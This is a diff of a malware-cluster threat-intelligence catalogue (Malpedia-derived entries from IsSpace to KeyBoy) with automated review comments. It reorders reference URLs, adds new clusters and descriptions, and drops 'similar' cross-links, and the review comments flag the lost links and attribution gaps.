- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://twitter.com/malwrhunterteam/status/1085162243795369984"
+ "https://twitter.com/malwrhunterteam/status/1085162243795369984",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/"
],
"synonyms": [],
"type": []
@@ -27722,12 +29345,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace",
+ "https://wikileaks.org/vault7/document/2015-09-20150911-280-CSIT-15085-NfLog/2015-09-20150911-280-CSIT-15085-NfLog.pdf",
+ "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/",
+ "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/",
"https://www.secureworks.com/research/threat-profiles/bronze-express",
"https://www.secureworks.com/research/threat-profiles/bronze-overbrook",
"http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf",
- "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/",
- "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/",
- "https://wikileaks.org/vault7/document/2015-09-20150911-280-CSIT-15085-NfLog/2015-09-20150911-280-CSIT-15085-NfLog.pdf",
"https://unit42.paloaltonetworks.com/watering-hole-attack-on-aerospace-firm-exploits-cve-2015-5122-to-install-isspace-backdoor/"
],
"synonyms": [
@@ -27735,15 +29358,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "b9707a57-d15f-4937-b022-52cc17f6783f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a3f41c96-a5c8-4dfe-b7fa-d9d75f97979a",
"value": "IsSpace"
},
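Review bot: Dropping the `related` array here removes the cross-reference from IsSpace to cluster `b9707a57-d15f-4937-b022-52cc17f6783f` (type `similar`, tagged almost-certain), and the same deletion recurs in this patch for Joao, Jolob, JripBot, Karkoff, Kazuar and KeyBoy. If these Malpedia-to-other-cluster links are now produced by a separate step or intentionally retired, the commit message should say so; otherwise consumers who pivot from a Malpedia cluster to the cluster it was linked to lose those edges silently. Suggest either keeping the `related` entries or documenting the removal in the PR description.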
@@ -27777,10 +29391,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.jaff",
- "http://malware-traffic-analysis.net/2017/05/16/index.html",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://clairelevin.github.io/malware/2023/02/14/jaff.html",
"https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
"https://intel471.com/blog/a-brief-history-of-ta505",
+ "http://malware-traffic-analysis.net/2017/05/16/index.html",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
"https://www.proofpoint.com/us/threat-insight/post/jaff-new-ransomware-from-actors-behind-distribution-of-dridex-locky-bart"
],
"synonyms": [],
@@ -27806,10 +29421,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku",
+ "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146",
"https://securelist.com/whos-really-spreading-through-the-bright-star/68978/",
- "https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf",
"https://www.brighttalk.com/webcast/7451/538775",
- "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146"
+ "https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf"
],
"synonyms": [
"C3PRO-RACOON",
@@ -27827,8 +29442,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.janeleiro",
- "https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf",
- "https://www.welivesecurity.com/2021/04/06/janeleiro-time-traveler-new-old-banking-trojan-brazil/"
+ "https://www.welivesecurity.com/2021/04/06/janeleiro-time-traveler-new-old-banking-trojan-brazil/",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf"
],
"synonyms": [],
"type": []
@@ -27842,8 +29457,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.jason",
"https://twitter.com/P3pperP0tts/status/1135503765287657472",
- "https://marcoramilli.com/2019/06/06/apt34-jason-project/",
"https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
+ "https://marcoramilli.com/2019/06/06/apt34-jason-project/",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf"
],
"synonyms": [],
@@ -27900,10 +29515,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.jhone_rat",
- "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/",
+ "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf",
"https://blog.talosintelligence.com/2020/01/jhonerat.html",
"https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf"
+ "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/"
],
"synonyms": [],
"type": []
@@ -27912,7 +29527,7 @@
"value": "JhoneRAT"
},
{
- "description": "",
+ "description": "According to PCrisk, Jigsaw is ransomware that uses the AES algorithm to encrypt various files stored on computers. Targeted files include .jpg, .docx, .mp3, .mp4, and many others.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.jigsaw"
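Review bot: The new description opens with "According to PCrisk", but no PCrisk URL appears in the refs visible in this hunk, which show only the Malpedia entry, so a reader of the galaxy cannot follow the attribution. If the upstream Malpedia record carries the PCrisk page, consider adding it to `refs` alongside the description.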
@@ -27936,20 +29551,33 @@
"uuid": "551b568f-68fa-4483-a10c-a6452ae6289e",
"value": "Jimmy"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jlorat",
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "8d3ed9af-c136-47a4-a0d2-50c8248435a4",
+ "value": "JLORAT"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.joanap",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
- "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware",
- "https://www.us-cert.gov/ncas/alerts/TA18-149A",
- "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A",
- "https://www.secureworks.com/research/threat-profiles/nickel-academy",
- "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/",
+ "https://app.box.com/s/xyyord0b806e6or2nh92coxw2areyyx4",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://app.box.com/s/xyyord0b806e6or2nh92coxw2areyyx4"
+ "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.secureworks.com/research/threat-profiles/nickel-academy",
+ "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware",
+ "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/",
+ "https://www.us-cert.gov/ncas/alerts/TA18-149A",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments"
],
"synonyms": [],
"type": []
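Review bot: The new JLORAT cluster lands with an empty `description` even though its second ref (the Securelist Tomiris article) would support a one-line summary; this matches neighbouring entries such as Jimmy and Joanap, so it is not blocking, but worth filling if the generator can pull it from upstream. Also make sure the freshly minted `"uuid": "8d3ed9af-c136-47a4-a0d2-50c8248435a4"` is persisted in whatever mapping the generator uses, so the next regeneration does not assign JLORAT a different uuid and break references to this one.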
@@ -27967,15 +29595,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "673d05fa-4066-442c-bdb6-0c0a2da5ae62",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "8201c8d2-1dab-4473-bbdf-42952b3d5fc6",
"value": "Joao"
},
@@ -28002,15 +29621,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "4d4528ff-6260-4b5d-b2ea-6e11ca02c396",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "97f12ca8-dc84-4a8c-b4c6-8ec1d1e79631",
"value": "Jolob"
},
@@ -28038,15 +29648,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "05e2ccec-7050-47cf-b925-50907f57c639",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "e895a0d2-fe4b-4793-9440-9db2d56a97f2",
"value": "JripBot"
},
@@ -28055,14 +29656,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.jsoutprox",
- "https://blog.yoroi.company/research/unveiling-jsoutprox-a-new-enterprise-grade-implant/",
- "https://www.zscaler.com/blogs/research/targeted-attacks-indian-government-and-financial-institutions-using-jsoutprox-rat",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
"https://twitter.com/zlab_team/status/1208022180241530882",
- "https://yoroi.company/research/financial-institutions-in-the-sight-of-new-jsoutprox-attack-waves/",
- "https://www.fortinet.com/blog/threat-research/adversary-playbook-javascript-rat-looking-for-that-government-cheese",
"https://blogs.quickheal.com/multi-staged-jsoutprox-rat-targets-indian-cooperative-banks-and-finance-companies/",
- "https://www.seqrite.com/documents/en/white-papers/whitepaper-multi-staged-jsoutprox-rat-target-indian-co-operative-banks-and-finance-companies.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf"
+ "https://www.fortinet.com/blog/threat-research/adversary-playbook-javascript-rat-looking-for-that-government-cheese",
+ "https://blog.yoroi.company/research/unveiling-jsoutprox-a-new-enterprise-grade-implant/",
+ "https://yoroi.company/research/financial-institutions-in-the-sight-of-new-jsoutprox-attack-waves/",
+ "https://www.zscaler.com/blogs/research/targeted-attacks-indian-government-and-financial-institutions-using-jsoutprox-rat",
+ "https://www.seqrite.com/documents/en/white-papers/whitepaper-multi-staged-jsoutprox-rat-target-indian-co-operative-banks-and-finance-companies.pdf"
],
"synonyms": [],
"type": []
@@ -28075,19 +29676,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.jssloader",
- "https://www.proofpoint.com/us/blog/threat-insight/jssloader-recoded-and-reloaded",
- "https://blog.morphisec.com/new-jssloader-trojan-delivered-through-xll-files",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.malwarebytes.com/blog/threat-intelligence/2022/08/jssloader-the-shellcode-edition",
- "https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/FIN7%20JSSLOADER%20FINAL%20WEB.pdf",
- "https://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html",
- "https://www.bleepingcomputer.com/news/security/malicious-microsoft-excel-add-ins-used-to-deliver-rat-malware/",
"https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
+ "https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/FIN7%20JSSLOADER%20FINAL%20WEB.pdf",
"https://malwarebytes.app.box.com/s/ym6r7o5hq0rx2nxjbctfv2sw5vx386ni",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/",
- "https://www.mandiant.com/resources/evolution-of-fin7",
"https://blog.morphisec.com/vmware-identity-manager-attack-backdoor",
- "https://www.secureworks.com/blog/excel-add-ins-deliver-jssloader-malware"
+ "https://www.mandiant.com/resources/evolution-of-fin7",
+ "https://www.secureworks.com/blog/excel-add-ins-deliver-jssloader-malware",
+ "https://www.bleepingcomputer.com/news/security/malicious-microsoft-excel-add-ins-used-to-deliver-rat-malware/",
+ "https://www.malwarebytes.com/blog/threat-intelligence/2022/08/jssloader-the-shellcode-edition",
+ "https://blog.morphisec.com/new-jssloader-trojan-delivered-through-xll-files",
+ "https://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html",
+ "https://www.proofpoint.com/us/blog/threat-insight/jssloader-recoded-and-reloaded",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/"
],
"synonyms": [],
"type": []
@@ -28100,11 +29701,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.juicy_potato",
- "https://lifars.com/wp-content/uploads/2020/06/Cryptocurrency-Miners-XMRig-Based-CoinMiner-by-Blue-Mockingbird-Group.pdf",
+ "https://www.sentinelone.com/blog/bluesky-ransomware-ad-lateral-movement-evasion-and-fast-encryption-puts-threat-on-the-radar/",
"https://github.com/ohpe/juicy-potato",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf",
"https://www.welivesecurity.com/2021/08/09/iispy-complex-server-side-backdoor-antiforensic-features/",
- "https://www.sentinelone.com/blog/bluesky-ransomware-ad-lateral-movement-evasion-and-fast-encryption-puts-threat-on-the-radar/"
+ "https://lifars.com/wp-content/uploads/2020/06/Cryptocurrency-Miners-XMRig-Based-CoinMiner-by-Blue-Mockingbird-Group.pdf",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf"
],
"synonyms": [],
"type": []
@@ -28138,17 +29739,30 @@
"uuid": "eab42a8e-22e7-49e4-8a26-44f14b6f67bb",
"value": "KAgent"
},
+ {
+ "description": "A Telegram bot with browser stealing capabilities, written using the .NET framework.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kami",
+ "https://twitter.com/jaydinbas/status/1604918636422070289"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d78ade16-d038-44b6-adfa-2439dcaf4d87",
+ "value": "Kami"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.karagany",
- "https://vblocalhost.com/uploads/VB2021-Slowik.pdf",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks",
"https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf",
- "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks",
+ "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group",
"https://www.secureworks.com/research/threat-profiles/iron-liberty",
- "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
+ "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector",
+ "https://vblocalhost.com/uploads/VB2021-Slowik.pdf"
],
"synonyms": [
"Karagny"
@@ -28177,9 +29791,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.karius",
+ "https://research.checkpoint.com/banking-trojans-development/",
"https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest",
- "https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/",
- "https://research.checkpoint.com/banking-trojans-development/"
+ "https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/"
],
"synonyms": [],
"type": []
@@ -28192,28 +29806,21 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.karkoff",
- "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html",
"https://www.secureworks.com/research/threat-profiles/cobalt-edgewater",
"https://blog.telsy.com/apt34-aka-oilrig-attacks-lebanon-government-entities-with-maildropper-implant/",
- "https://mp.weixin.qq.com/s/o_EVjBVN2sQ1q7cl4rUXoQ",
"https://blog.yoroi.company/research/karkoff-2020-a-new-apt34-espionage-operation-involves-lebanon-government/",
+ "https://mp.weixin.qq.com/s/o_EVjBVN2sQ1q7cl4rUXoQ",
+ "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html",
+ "https://www.trendmicro.com/en_us/research/23/b/new-apt34-malware-targets-the-middle-east.html",
"https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae"
],
"synonyms": [
"CACTUSPIPE",
- "MailDropper"
+ "MailDropper",
+ "OILYFACE"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "a9fc6d3d-09d5-45c3-a91e-e8c61ef37908",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a45c16d9-6945-428c-af46-0436903f9329",
"value": "Karkoff"
},
@@ -28222,14 +29829,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.karma",
- "https://news.sophos.com/en-us/2022/02/28/conti-and-karma-actors-attack-healthcare-provider-at-same-time-through-proxyshell-exploits/?cmp=30728",
- "https://blog.cyble.com/2021/08/24/a-deep-dive-analysis-of-karma-ransomware/",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/",
"https://www.sentinelone.com/labs/karma-ransomware-an-emerging-threat-with-a-hint-of-nemty-pedigree/",
+ "https://news.sophos.com/en-us/2022/02/28/conti-and-karma-actors-attack-healthcare-provider-at-same-time-through-proxyshell-exploits/?cmp=30728",
+ "https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
"https://blogs.blackberry.com/en/2021/11/threat-thursday-karma-ransomware",
"https://www.youtube.com/watch?v=hgz5gZB3DxE",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/"
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://blog.cyble.com/2021/08/24/a-deep-dive-analysis-of-karma-ransomware/"
],
"synonyms": [],
"type": []
@@ -28242,8 +29849,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kasperagent",
- "https://www.threatconnect.com/blog/kasperagent-malware-campaign/",
- "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/"
+ "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/",
+ "https://www.threatconnect.com/blog/kasperagent-malware-campaign/"
],
"synonyms": [],
"type": []
@@ -28256,27 +29863,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kazuar",
- "http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://securelist.com/apt-trends-report-q1-2021/101967/",
- "https://www.epicturla.com/blog/sysinturla",
"https://youtu.be/SW8kVkwDOrc?t=24706",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/",
+ "https://www.epicturla.com/blog/sysinturla",
+ "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
"https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity",
+ "https://securelist.com/apt-trends-report-q1-2021/101967/",
"https://securelist.com/sunburst-backdoor-kazuar/99981/",
- "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection"
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "a5399473-859b-4c64-999b-a3b4070cd513",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "bab92070-3589-4b7e-bf05-4f54bfefc2ca",
"value": "Kazuar"
},
@@ -28311,8 +29910,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kegotip",
- "https://intel471.com/blog/a-brief-history-of-ta505",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/"
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://intel471.com/blog/a-brief-history-of-ta505"
],
"synonyms": [],
"type": []
@@ -28340,14 +29939,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos",
- "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf",
- "https://www.crowdstrike.com/blog/farewell-to-kelihos-and-zombie-spider/",
- "https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/",
"https://en.wikipedia.org/wiki/Kelihos_botnet",
- "https://www.justice.gov/opa/pr/russian-national-convicted-charges-relating-kelihos-botnet",
"https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/",
- "https://www.bleepingcomputer.com/news/security/us-convicts-russian-national-behind-kelihos-botnet-crypting-service/",
+ "https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/",
+ "https://www.crowdstrike.com/blog/farewell-to-kelihos-and-zombie-spider/",
"https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/",
+ "https://www.justice.gov/opa/pr/russian-national-convicted-charges-relating-kelihos-botnet",
+ "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf",
+ "https://www.bleepingcomputer.com/news/security/us-convicts-russian-national-behind-kelihos-botnet-crypting-service/",
"https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/"
],
"synonyms": [],
@@ -28374,18 +29973,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kerrdown",
- "https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/",
- "https://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7",
- "https://www.amnesty.de/sites/default/files/2021-02/Amnesty-Bericht-Vietnam-Click-And-Bait-Blogger-Deutschland-Spionage-Menschenrechtsverteidiger-Februar-2021.pdf",
- "https://blog.cystack.net/word-based-malware-attack/",
"https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf",
"https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/",
+ "https://www.amnesty.de/sites/default/files/2021-02/Amnesty-Bericht-Vietnam-Click-And-Bait-Blogger-Deutschland-Spionage-Menschenrechtsverteidiger-Februar-2021.pdf",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/",
- "https://www.secureworks.com/research/threat-profiles/tin-woodlawn",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam"
+ "https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/",
+ "https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/",
+ "https://www.secureworks.com/research/threat-profiles/tin-woodlawn",
+ "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam",
+ "https://blog.cystack.net/word-based-malware-attack/",
+ "https://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7"
],
"synonyms": [],
"type": []
@@ -28398,9 +29997,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrican",
+ "https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/",
"https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
"https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf",
- "https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/",
"https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/"
],
"synonyms": [],
@@ -28427,13 +30026,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.keybase",
- "https://www.virusbulletin.com/virusbulletin/2016/07/new-keylogger-block/",
- "https://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html",
- "https://unit42.paloaltonetworks.com/keybase-threat-grows-despite-public-takedown-a-picture-is-worth-a-thousand-words/",
- "https://isc.sans.edu/forums/diary/Malicious+Office+files+using+fileless+UAC+bypass+to+drop+KEYBASE+malware/22011/",
"https://community.rsa.com/community/products/netwitness/blog/2018/02/15/malspam-delivers-keybase-keylogger-2-11-2017",
- "https://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/",
- "https://voidsec.com/keybase-en/"
+ "https://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html",
+ "https://isc.sans.edu/forums/diary/Malicious+Office+files+using+fileless+UAC+bypass+to+drop+KEYBASE+malware/22011/",
+ "https://www.virusbulletin.com/virusbulletin/2016/07/new-keylogger-block/",
+ "https://voidsec.com/keybase-en/",
+ "https://unit42.paloaltonetworks.com/keybase-threat-grows-despite-public-takedown-a-picture-is-worth-a-thousand-words/",
+ "https://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/"
],
"synonyms": [
"Kibex"
@@ -28448,26 +30047,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.keyboy",
+ "https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/",
+ "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html",
"https://www.secureworks.com/research/threat-profiles/bronze-hobart",
"https://citizenlab.ca/2016/11/parliament-keyboy/",
- "https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/",
- "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/"
],
"synonyms": [
"TSSL"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "74167065-90b3-4c29-807a-79b6f098e45b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "28c13455-7f95-40a5-9568-1e8732503507",
"value": "KeyBoy"
},
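Review bot: The `related` block pointing at dest-uuid `74167065-90b3-4c29-807a-79b6f098e45b` (type `similar`, estimative-language almost-certain) is removed here with no replacement. The same removal recurs for KEYMARBLE, KHRAT, KimJongRat, Kingminer, Koadic and Konni further down, so this looks like a generator-level change rather than a per-cluster correction; the commit should state that explicitly, and anyone consuming these `similar` relationships (e.g. cross-galaxy correlation) will silently lose them once this lands. If the relationships are meant to move elsewhere, that should be visible in the same change.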
@@ -28476,9 +30066,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.keylogger_apt3",
+ "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong",
"https://intrusiontruth.wordpress.com/2017/05/09/apt3-is-boyusec-a-chinese-intelligence-contractor/",
- "https://twitter.com/smoothimpact/status/773631684038107136",
- "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong"
+ "https://twitter.com/smoothimpact/status/773631684038107136"
],
"synonyms": [],
"type": []
@@ -28491,23 +30081,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble",
